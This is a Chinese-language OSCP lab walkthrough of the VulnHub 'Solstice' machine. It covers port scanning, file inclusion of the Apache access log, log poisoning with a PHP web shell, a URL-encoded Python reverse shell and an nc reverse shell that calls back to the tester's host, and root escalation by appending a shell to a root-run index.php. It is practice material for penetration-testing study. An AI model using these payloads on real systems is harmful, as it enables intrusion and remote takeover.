OSCP官方靶场-Solstice WP

官方网页打开或靶场下载链接

https://www.vulnhub.com/entry/sunset-solstice,499/

信息收集

靶机地址:

bash 复制代码
192.168.149.72

扫描开放的端口,使用VPN扫描又挂代理的话,又一定记录扫漏了。考试时候建议用官方的My kali先扫一遍,是最快最全的。

bash 复制代码
ports=$(sudo nmap -p- --min-rate=10000 -Pn 192.168.149.72 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
sudo nmap --script=vuln -p$ports -Pn 192.168.149.72
sudo nmap -sU --min-rate 10000 -p- -Pn 192.168.149.72

再次细致的扫描端口上的组件和版本信息,这里VPN断了,所以没有扫除具体信息。从之前用官方的My Kali扫描的信息能获得一些端口的信息。

bash 复制代码
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.149.72

从之前的扫描信息中看,除了80端口,还有8593端口也开放,一个一个点开了看看有什么。

文件包含

从8593端口的链接方式猜测似乎有文件包含漏洞

html 复制代码
../../../../../../../../../var/log/apache2/access.log

log文件投毒

可以看到log文件中记录了请求头,我们下一步在请求头中写入一句话木马,就可以把log污染成马。

到这里链接断了,换了重启靶机后IP更换为 192.168.196.72,用Win本机的Burp抓不上包改用命令行注入

bash 复制代码
echo -e "GET / HTTP/1.1\r\nHost: 192.168.51.72\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.51.72 80
或者
nc 192.168.43.127 80
回车输入GET /<?php system($_GET['cmd']); ?> HTTP/1.1

或者也可以用浏览器工具,但是这个似乎不成功。

反弹Shell

然后把命令换成反弹shell的命令,这个本机的地址

bash 复制代码
python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.180%22%2C4777%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27

提权

输入以下命令查找有root权限的文件和进程

bash 复制代码
ps -aux | grep root

可以发现在/var/tmp/sv/目录下似乎有一些奇特的东西

这是一个php文件,是网页主页的文件,从命令来看,他开在57端口。下一步的思路就是,把这个php改成能提权弹shell的木马。然后访问57端口就能激活这个一句话木马。

bash 复制代码
echo "<?php system('nc 192.168.45.180 4445 -e /bin/bash')?>" >> index.php

57这个端口没有对外开放,所以我们只能在shell上弹一下。

bash 复制代码
.\nc.exe -lvnp 4445
curl 127.0.0.1:57/index.php

补充知识点

/usr/sbin/nologin和**/bin/bash**的区别

特性 /usr/sbin/nologin /bin/bash
基本用途 禁止交互式登录 允许交互式命令行操作
用户类型 系统服务账户(如 mysql, www-data) 普通用户或管理员账户
登录行为 ▶ 拒绝登录 ▶ 显示预设提示信息(默认或自定义) ▶ 允许登录 ▶ 启动 Bash 交互环境
Shell 功能 无执行能力(仅返回错误信息) 完整命令行解释器(支持脚本/命令)
自定义提示 支持(通过 /etc/nologin.txt 文件) 通过 ~/.bashrc 自定义
典型应用场景 守护进程账户 FTP虚拟用户 安全锁账户 普通用户登录 管理员维护 开发环境
检查命令 grep nologin /etc/passwd grep bash /etc/passwd
详细说明
  1. /usr/sbin/nologin

    • 安全隔离机制:阻止账户获得任何交互式 Shell

    • 工作流程:

      1. 用户尝试登录(SSH/FTP/控制台)
      2. 系统显示拒绝信息(默认:"This account is currently not available.")
      3. 立即终止会话
    • 自定义提示:

      复制代码
      echo "管理员专用账户,禁止登录" > /etc/nologin.txt
    • 典型配置示例

      (/etc/passwd):

      复制代码
      ftpuser:x:1001:1001::/var/ftp:/usr/sbin/nologin
  2. /bin/bash

    • 全功能交互环境:

      • 支持命令执行、脚本运行、作业控制
      • 配置文件:~/.bashrc, ~/.profile
    • 开发/运维能力:

      复制代码
      # 允许运行所有命令
      $ vim /etc/config
      $ systemctl restart service
⚠️ 重要安全建议
  • 系统服务账户 必须使用 nologin(如 MySQL/Nginx 账户)
  • 普通用户 仅在必要时应获得 bash 权限
  • 临时锁定账户usermod -s /usr/sbin/nologin username
  • 解锁账户usermod -s /bin/bash username

推荐小工具rlwarp

可以让反弹shell用上下键快捷切换历史命令,而不是输入一堆[A[A[A[A

bash 复制代码
sudo apt-get install rlwrap
# 原版nc
nc -nlvp 4444
# 能上下翻历史命令的nc
rlwarp -cAr nc -nlvp 4444

推荐小工具peass小豌豆

https://github.com/peass-ng/PEASS-ng

能够扫描分析初步获得权限的设备上可以的文件。

相关推荐
这儿有一堆花8 分钟前
Nginx服务器集群:横向扩展与集群解决方案
运维·服务器·nginx
时序数据说13 分钟前
时序数据库的存储之道:从数据特性看技术要点
大数据·数据库·物联网·开源·时序数据库·iotdb
刘孬孬沉迷学习17 分钟前
5G标准学习笔记15 --CSI-RS测量
网络·笔记·学习·5g·信息与通信·信号处理
敲上瘾39 分钟前
传输层协议UDP原理
linux·c语言·网络·网络协议·udp
鸥梨菌Honevid1 小时前
QT解析文本框数据——概述
数据库·qt·mysql
egoist20231 小时前
【Linux仓库】命令行参数与环境变量【进程·伍】
linux·运维·服务器·环境变量·命令行参数·内建命令
今天又得骑车了1 小时前
一、MySQL 8.0 之《EXPLAIN ANALYZE 执行计划》
数据库·mysql·database
Fireworkitte1 小时前
Linux 中替换sed
linux·运维·服务器
gooxi_hui1 小时前
性能狂飙 Gooxi 8卡5090服务器重新定义高密度算力
运维·服务器
weixin_420571871 小时前
Windos服务器升级MySQL版本
运维·服务器·mysql